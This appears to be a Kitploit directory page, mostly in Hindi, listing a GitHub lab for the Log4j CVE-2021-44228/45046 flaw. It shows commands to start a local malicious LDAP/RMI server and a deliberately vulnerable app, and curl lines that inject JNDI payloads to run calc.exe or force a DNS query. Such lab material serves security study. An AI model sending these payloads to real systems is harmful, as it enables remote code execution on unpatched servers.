Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
log4j-cve-2021-44228 — Log4j CVE-2021-44228 examples: Remote Code Execution (through LDAP, RMI, ...), Forced DNS queries, ... | Kitploit
उपकरण/GitHubGitHub/manuel-alvarez-alvarez/log4j-cve-2021-44228
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubmanuel-alvarez-alvarez/log4j-cve-2021-44228

log4j-cve-2021-44228

Log4j CVE-2021-44228 examples: Remote Code Execution (through LDAP, RMI, ...), Forced DNS queries, ...

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
514 साल पहलेअभी तक समीक्षित नहीं

Log4j CVE-2021-44228 और CVE-2021-45046

आवश्यकताएँ

एक असुरक्षित JDK का उपयोग करें, उदाहरण के लिए JDK 1.8.0_181

उपयोग

दुर्भावनापूर्ण सर्वर

दुर्भावनापूर्ण सर्वर निम्नलिखित एंडपॉइंट तैनात करता है:

  • 1389 LDAP सर्वर
  • 1099 RMI सर्वर
  • 8081 HTTP सर्वर
root@kitploit:~
./gradlew :malicious-server:bootRun

असुरक्षित एप्लिकेशन

असुरक्षित एप्लिकेशन 8082 पर एक HTTP एंडपॉइंट तैनात करता है

root@kitploit:~
./gradlew :vulnerable-app:bootRun

दूरस्थ कोड निष्पादन

एक पेलोड चुनें जिसे असुरक्षित एप्लिकेशन द्वारा निष्पादित किया जाएगा और उसे Base64 में एन्कोड करें। उदाहरण के लिए, कैलकुलेटर खोलने के लिए विंडोज़ में: calc.exe

LDAP

root@kitploit:~
curl --header "X-Vulnerable-Header: ${jndi:ldap://localhost:1389/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/

RMI

root@kitploit:~
curl --header "X-Vulnerable-Header: ${jndi:rmi://localhost:1099/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/

DNS क्वेरीज़

root@kitploit:~
curl --header "X-Vulnerable-Header: ${jndi:dns://8.8.8.8/google.es}" http://127.0.0.1:8082/
टूल डाउनलोड करें